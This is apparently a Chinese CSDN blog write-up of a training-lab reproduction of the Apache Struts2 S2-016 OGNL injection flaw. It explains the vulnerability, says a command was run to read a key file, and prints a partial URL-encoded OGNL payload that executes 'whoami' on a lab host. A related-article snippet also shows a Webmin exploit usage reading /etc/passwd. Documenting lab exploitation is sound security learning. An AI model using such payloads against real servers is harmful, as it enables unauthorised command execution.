0x1E. Apache Struts2远程代码执行漏洞(S2-016)复现

最新推荐文章于 2022-11-26 00:15:00 发布
最新推荐文章于 2022-11-26 00:15:00 发布
阅读量555 收藏
点赞数
分类专栏: 墨者学院 文章标签: 墨者学院 S2-016
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31679787/article/details/102570638
版权

s2-016:在2.3.15.1之前的Struts 2中,“ action:”,“ redirect:”或“ redirectAction:”之后的信息未正确清除。由于所述信息将根据值堆栈作为OGNL表达式进行评估,因此这引入了注入服务器端代码的可能性;

使用工具检测s2-016漏洞,发现存在漏洞;

命令执行,发现key.txt;

查看文件,得到key;

poc:

http://219.153.49.228:48008/index.action?redirect%3A%24%7B%23a%3d%28new java.lang.ProcessBuilder%28new java.lang.String%5B%5D%7B%27whoami%27%7D%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew java.io.InputStreamReader%28%23b%29,%23d%3d

最低0.47元/天 解锁文章
半情调
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院13 Apache Struts2远程代码执行漏洞(S2-016)复现
weixin_42789937的博客
02-24 831
墨者学院13 Apache Struts2远程代码执行漏洞(S2-016)复现,参考大佬的wp,是第二版,补充了一些下载御剑、maltego的错误解题过程(●'◡'●)~
Apache Struts2远程代码执行漏洞(S2-016
weixin_47493074的博客
09-24 939
Apache Struts2远程代码执行漏洞(S2-016
[旧文系列] Struts2历史高危漏洞系列-part4:S2-016/S2-032/S2-045
mole_exp的博客
01-18 1423
文章目录关于<旧文系列>前言S2-016漏洞复现与分析可回显PoC漏洞修复S2-032漏洞复现与分析可回显PoC漏洞修复S2-045漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 htt
struts2远程代码执行漏洞合集
黑白的博客
12-21 4664
声明 好好学习,天天向上 S2-001 漏洞描述 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 影响范围 Struts 2.0.0 - Struts 2.0.8 复现过程 使用vulhub cd /app/vulhub-m
Struts2-S2-016/17
aming小老弟
04-18 1156
QQ 1285575001 Wechat M010527 技术交流 QQ群599020441 纪年科技aming #前文# 通过该实验了解java开发流行框架struts2安全缺陷形成的原因, 掌握基本的漏洞利用及使用方法, 并能够通过代码审计给出加固方案。 #基础知识# 了解Struts2 Struts是Apache软件基金会赞助的一个Java开源项目, 通过采用JavaServlet/JSP技术, 实现了基于Java EE Web应用的MVC设计模式的应用框架, 是MVC经典设计模式中的一个..
java struts2 漏洞复现合集
whatday的专栏
08-31 4249
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
windows无法连接到打印机SHA-2代码签名补丁win7修复工具打印机连接错误0x0004005.rar
12-16
在使用Windows操作系统时,尤其是Windows 7或更早版本,可能会遇到“无法连接到打印机”的问题,这种情况通常伴随着错误代码0x00004005。此问题的根源可能涉及多种因素,包括系统兼容性、驱动程序不兼容、网络连接...
0x19.第十九课 MetaSploit对cve-2019-0708的漏洞攻击复现.pdf
06-24
0x19.第十九课 MetaSploit对cve-2019-0708的漏洞攻击复现.pdf
毕业设计企业网站源码-s2-052-reproducing:s2-052-再现
06-06
S2-052(CVE-2017-9805)远程代码执行漏洞 0x00 漏洞描述 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。 Struts2是一个基于MVC设计模式的...
S2-016漏洞利用工具
05-03
S2-016的检测和利用
struts2-016/017漏洞解决
03-21
在不升级原框架的基础上解决漏洞
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-016(CVE-2013-2251)
qq_51577576的博客
11-26 700
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-016(CVE-2013-2251) 在struts2中,DefaultActionMapper类支持以"action:"、“redirect:”、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令
Struts2 S2-016,S2-017远程代码执行漏洞解决,修复
热门推荐
yx9o
03-26 1万+
Struts2 S2-016,S2-017远程代码执行漏洞解决,修复 官网描述如下: http://struts.apache.org/release/2.3.x/docs/s2-016.html 怎么解决呢?
s2-016漏洞复现
qq_39966991的博客
12-20 889
s2-016漏洞复现 首先介绍一下struts2框架:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户
墨者学院-Apache Struts2远程代码执行漏洞(S2-013)复现
JimWu的博客
09-04 1852
Apache Struts2远程代码执行漏洞(S2-013)复现 难易程度:★ 题目类型:命令执行 使用工具:FireFox浏览器、burpsuite 漏洞原理: s:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL...
漏洞总结及修复
0xdawn的博客
02-05 3109
0x00 暴力破解 暴力破解,是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一。如2014年轰动全国的12306撞库事件,实质就是暴力破解攻击。 C/S架构 Hydra 破解MySQL hydra -L user.txt -P pass.txt 192.168.0.1 mysql 破解FTP hydra -l admin -P pass.txt -t 5 ...
i2ctransfer -f -y 8 w4@0x68 0x32 0x02 0x04 0x1e r5 转换成代码
最新发布
05-30
假设你是在Linux系统下使用i2c-tools中的i2ctransfer命令进行I2C通信,那么可以将命令转换为C语言代码,如下所示: ```c #include <linux/i2c-dev.h> #include <sys/ioctl.h> #include <fcntl.h> #include <unistd....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值